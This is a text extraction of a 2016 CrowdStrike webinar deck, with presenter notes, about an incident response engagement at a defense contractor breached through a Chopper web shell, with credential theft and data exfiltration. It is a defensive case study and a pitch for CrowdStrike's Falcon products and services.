Today’s attackers are more brazen and patient than ever – often masquerading as legitimate users while they search the victim’s environment for their most prized data. And the longer these attackers remain undetected, the greater the cost to the business, be that your reputation or loss of IP. Therefore, organizations must detect and respond to incidents as quickly, efficiently and accurately as possible.
In this webinar, we provide unique insights into how one Fortune 500 organization successfully responded to a sustained and sophisticated breach. You’ll hear from the incident responders and digital forensics experts who actually worked the case, and learn the the cutting-edge techniques that were used. We will cover topics such as:
* Typical infrastructure weaknesses prevalent in organizations today
* How attackers exploit IT infrastructure weaknesses
* The prevalence of attacker attempts to re-enter environments, even after full remediation
* How state-of-the-art digital detection and forensics tools like
* Falcon Host & Falcon Forensics speed remediation by providing immediate visibility AND rear-view mirror look at past activities
incident response, DFIR, reducing dwell time, cybersecurity, cyber security, best practices
2. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
1 INTRODUCTION
AGENDA:
IR CASE OVERVIEW AND SEQUENCE OF EVENTS4
6 DETECTING ATTACKERS BEFORE THEY GET BACK IN
2 CURRENT INCIDENT RESPONSE TRENDS
3 CROWDSTRIKE’S INVESTIGATIVE METHODOLGY
7 KEY TAKEAWAYS
8 Q&A
4. RYAN JAFARKHANI
PRINCIPAL CONSULTANT
2016 CROWDSTRIKE INC. ALL RIGHTS RESERVED.
• Host & Network Forensics
• Malware Analysis/Reverse Engineering
• Intel/Attribution
HAS WORKED 70+ INVESTIGATIONS IN:
• State Sponsored
• Financial Crime
• Insider Threats
6+ YEARS
SPECIALIZED EXPERIENCE IN:
PRIOR TO CROWDSTRIKE:
5. ERIC OPDYKE
CONSULTANT
2016 CROWDSTRIKE INC. ALL RIGHTS RESERVED.
• Host & Network Forensics
• Malware Analysis/Reverse Engineering
• Penetration Testing
• State sponsored attacks
SPECIALIZED EXPERIENCE IN:
6+ YEARS
PRIOR TO CROWDSTRIKE:
6. 2015 CrowdStrike, Inc. All rights reserved. 6
MOST COMMON
BREACH
TYPES:
Intellectual Property (IP) Theft
Monetary Theft
Web Server Compromise
Data Destruction
Credential Theft
MOST COMMON
INITIAL ATTACK
VECTORS:
Distributed Denial of Service (DDoS)
Web Server Vulnerabilities
Web Application Vulnerabilities
Misconfigured DMZ Servers
Spear Phishing
Third-party Trust Relationships
Strategic Web Compromise
Weak Authentication Mechanisms
Malicious Insider Threats
SQL Injection
2016 CROWDSTRIKE INC. ALL RIGHTS RESERVED.
7. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
1:
MULTIPLE
ATTACKER
S
In 25% of
CrowdStrike’s
engagements, we
identified multiple
distinct adversaries
in the client
environment.
2:
REINFECTION
ATTEMPTS
On average,
adversaries engage
in reinfection
attempts within two
days of
comprehensive
remediation efforts.
3:
SELF
DETECTION
RATES
IMPROVING
CrowdStrike has
seen a marked
increase in the
number of
organizations self-
detecting
breaches, far above
what has been
previously reported.
4:
CREDENTIALS
A CRITICAL
TARGET
Regardless of
adversary or
motivation, the
most common
goal of attackers
is to secure
domain and
enterprise
credentials.
5:
COMPROMISED
ACCOUNTS
HOARDED
Unlike large-scale
attacks of the
past, adversaries
no longer need to
compromise
hundreds of
accounts to
accomplish their
objectives.
6:
VARIATION IN
DURATION
The review of
CrowdStrike
investigations
found wide
variation in the
duration of
investigations.
INCIDENT RESPONSE TRENDS
8. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
TRADITIONAL IR = SLOW RESPONSE
Customers wait for a remediation plan
before any actual remediation work occurs
MONTHS MONTHS
MANY
DAYS WEEKS
BREACH DISCOVERY IR START VISIBILITY
IR FINISHED
REMEDIATE
9. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
INCIDENT RESPONSE SERVICES
By providing the client an immediate and comprehensive view
into attacker activity, we stop breaches fast.
Identify how attackers have
been or are accessing the
client’s environment
Mitigate attackers
existing access with
appropriate methods
Determine methods to
track future actions and
block future access
END GOAL Get customers back to normal business operations quickly
10. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
INVESTIGATIVE METHODOLOGY
The power of Falcon Host and Falcon Intelligence provides immediate visibility and
threat actor information that informs our remediation efforts – and gets our clients
back to business FAST.
SERVICES
FALCON
INTEL
FALCON
HOST
11. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
IR CASE:
BACKGROUND
Client: Research and Technology defense contractor
FBI notified the client of breach February 2015
Data theft occurred over Christmas 2014
Two foreign IP addresses were involved
CrowdStrike Services engaged and responded and
on-site within 24 hours
12. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
OVERALL ENGAGEMENT GOALS
GAIN VISIBILITY by deploying technical tools to 200 hosts
ANSWER: Who? What? Where? When? How?
- Falcon Host: provides real-time visibility and answers:
“What’s happening now?”
- Falcon Forensic Collector: provides rear-views, answers: “What
happened in the past?”
- Deploy network monitoring technology to main egress points
MAIN TOOLS USED DURING ENGAGEMENT:
13. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
IR CASE:
INFRASTRUCTURE
WEAKNESSES
No central logging for any log sources
Local users had administrative privileges
Shared local administrator account enabled
Service accounts with Domain Admin privileges
Flat network (DMZ can access corporate network)
THESE ARE TYPICAL
INFRASTRUCTURE
WEAKNESS CROWDSTRIKE
SERVICES ENCOUNTERS
14. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
REARVIEW
INSIGHTS
WITH FALCON
FORENSICS
Services team utilized Falcon Forensics
Collector (FFC): Windows console application
designed to gather system information for
incident response engagements
Collects information such as: drivers,
dirlistings, hashes, registry entries, event log
entries and much more
Support full disk forensics and established
attacker’s past activities
Enables Services team to provide client with
instantaneous evidence of attacker activity
15. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
OCT. 13, 2011 - FIRST ATTACKER
ACTIVITY: RAN REMOTE EXECUTION UTILITY ON
CLIENT’S SERVER
IR CASE TIMELINE OF EVENTS
JULY 24, 2014: INITIAL DATA THEFT BEGINS
■ Falcon Forensics identified data theft that started and continued to Feb. 2015
■ Attacker utilized C# Chopper Web Shell components on OWA servers.
■ From July to Nov. 2014, the attacker periodically dumped credentials on the client's domain
controller and cached credentials on other hosts in the environment.
JULY 14, 2014 - ATTACKER LEVERAGED
CREDENTIAL THEFT UTILITIES AND REMOTE
ACCESS CAPABILITIES GOAL: ACCESS INFORMATION
WITHIN THE CLIENT'S ENVIRONMENT AND ALSO GAIN FUTURE
ACCESS.
JAN. 15, 2014 – SECOND ATTACKER
ACTIVITY:
RAN REMOTE SCANNER ON CLIENT SERVER
16. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
FEB. 17, 2015 ATTACKER LEVERAGED
THE WEB SHELL ON CLIENT WEB
SERVER TO CONDUCT RECONNAISSANCE
AND ACCESSED SEVERAL SERVER DIRECTORIES
AND FILES
IR CASE TIMELINE OF EVENTS – CONTINUED
DEC. 25-29 – SECOND DATA THEFT
OCCURS: RAN REMOTE EXECUTION UTILITY ON
CLIENT’S SERVER
FEB. 7, 2015 – FBI NOTIFIES CLIENT OF
ATTACK THAT OCCURRED DEC. 25
FEB. 9, 2015 – CROWDSTRIKE IR
ENGAGEMENT BEGINS
FEB. 17-24: FORENSICS AND REMEDIATION
PERIOD: ATTACKER EJECTED FROM CLIENT’S
ENVIRONMENT
HOURS TO REMEDIATION
100
17. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
IR CASE ATTACK IMPACT
Theft of more than
500 GB
of proprietary data
THE DAMAGE?
October 2011
EARLIEST EVIDENCE OF ATTACKER ACTIVITY:
Leveraged web shells as primary backdoor
Used Administrator and Service accounts
Attacker leveraged TeamViewer and Remote
Desktop to move laterally
41 pieces of malware and utilities
49 compromised accounts
14 compromised and/or accessed systems
ATTACKER TTPs AND THEIR IMPACT:
18. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
FALCON HOST
DETECTS AND
KEEPS THE
ATTACKER OUT
After remediation, the attacker
returned to the environment, which
is common
But detecting a returning attacker
and reacting quickly is not
common.
From the initial email alert Falcon
Host generated, it took the client
less than 45 minutes to react
and pull the systems affected
Client permanently
decommissioned systems
We haven’t heard a peep since
19. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
CLIENT
RECOMMENDATIONS
TO PREVENT
FUTURE BREACHES
Client should continue focus
on detection
Review logs available
Utilize effective host-based
and network-based visibility
tools to monitor for activity
Goals: identify future activity
quickly and take remediation
actions based on detection
20. 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
REMEDIATION-FOCUS IR = FAST RECOVERY
We start immediately to mitigate damage and remove attackers.
HOURS DAYS/WEEKS
BREACH &
DISCOVERY IR START
IR FINISHED
REMEDIATE
HOURS
VISIBILITY
FALCON HOST
21. Expert IR practitioners can
leverage your security
investments and the latest
technology
Choose an IR team
that partners with
clients to ensure
effective engagements
Effective IR staff
prepare you for the
future with knowledge
to client’s IT staff
2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
KEY TAKEAWAYS
Documentation should
be clear and
recommendations should
be actionable
22. WE STOP BREACHES
CROWDSTRIKE TOTAL VALUE
ENDPOINT
PROTECTION
MANAGED
HUNTING
RESPONSE
SERVICES
THREAT
INTELLIGENCE
PEOPLEPROCESS TECHNOLOGYINTELLIGENCE
OUR
CUSTOMERS
2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
23. An IR engagement provides clients an immediate and comprehensive
view into attacker activity:
Who is the adversary?
Can you help eject him?
How should we reduce
risk of future attacks?
YOUR NEXT STEP: COMPROMISE ASSESSMENT
Are there signs of
current or past targeted
attack?
1 2 3
2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
Today’s attackers are more brazen and patient than ever – often masquerading as legitimate users while they search the victim’s environment for their most prized data. And the longer these attackers remain undetected, the greater the cost to the business, be that your reputation or loss of IP. Therefore, organizations must detect and respond to incidents as quickly, efficiently and accurately as possible.
Join us March 15th as we provide unique insights into how one F500 organization successfully responded to a sustained and sophisticated breach. You’ll hear from the incident responders and digital forensics experts who actually worked the case, and learn the the cutting-edge techniques that were used. We will cover topics such as:
Typical infrastructure weaknesses prevalent in organizations today
How attackers exploit IT infrastructure weaknesses
The prevalence of attacker attempts to re-enter environments, even after full remediation
How state-of-the-art digital detection and forensics tools like Falcon Host & Falcon Forensics speed remediation by providing immediate visibility AND rear-view mirror look at past activities
Typical infrastructure weaknesses prevalent in organizations today
How attackers exploit IT infrastructure weaknesses
The prevalence of attacker attempts to re-enter environments, even after full remediation
How state-of-the-art digital detection and forensics tools like Falcon Host & Falcon Forensics speed remediation by providing immediate visibility AND rear-view mirror look at past activities
The CrowdStrike Services team offers the full spectrum of proactive and response services to help customers respond tactically to cybersecurity incidents as well as continually mature and strategically evolve their overall security posture.
Chopper is a feature rich web shell that gives attackers the ability to manipulate files and databases; it also provides remote command shell access.
Q for CS team: how much into the weeds do we want to go to describe attacker methods (i.e. use Chopper web shell to exploit OWA/Exchange server weakness (would we need to point out that Microsoft has since fixed this vulnerability?)
\
REMIND THE AUDIENCE THAT THE CASE WE JUST STUDIED TOOK 100 HOUSRS TOTAL FOR FORENSICS AND REMEDIATION
Falcon Intelligence aids Services by providing current IOCs, IOAs and adversary-specific profiles: our team knows what to look for BEFORE an engagement starts.
Falcon Host provides immediate visibility to see what attackers are doing.Net result? Remediation efforts are completed in days and weeks, not months
HOWEVER, OUR SERVICS TEAM IS TECHNOLOGY AGNOSTIC: if you have made an investment in another endpoint detection & response tool, our team can make use of it.
This is about helping you, the client, remediate the situation.
CrowdStrike Total Value
Next step: establish the status of your environment with a compromise assessemtn.
We will assess your environment for threats that may already have established a presence in your network. We will seek to answer these questions:
• Is there currently targeted attack activity affecting your operations?
• What can you do to reduce the risk of a targeted attack?
• How can you deter and prevent attacks that target your environment and confidential customer information?
Of all our proactive services, this is perhaps the most important: perhaps you had a CA six months ago. Great, but do you know what your environment status is now?
Thank you for attending today’s CrowdCast on taking the dwell time out of an incident response engagement.
As I mentioned when we started, we’d leave about 10-15 minutes for questions, so if you haven’t already go ahead and post your questions in the Zoom chat window.
We’ll do our best to answer as many of these as we can.
So that wraps up this CrowdCast today!
Thanks to Eric and Ryan from the Crowdstrike Services team for their valuable time and insights on working quickly to get one of our customers back to business quickly.
Visit the URL displayed to learn more.
We will send follow-up email with more information our our Compromise Assessment offering to help you bolster your organization’s security posture.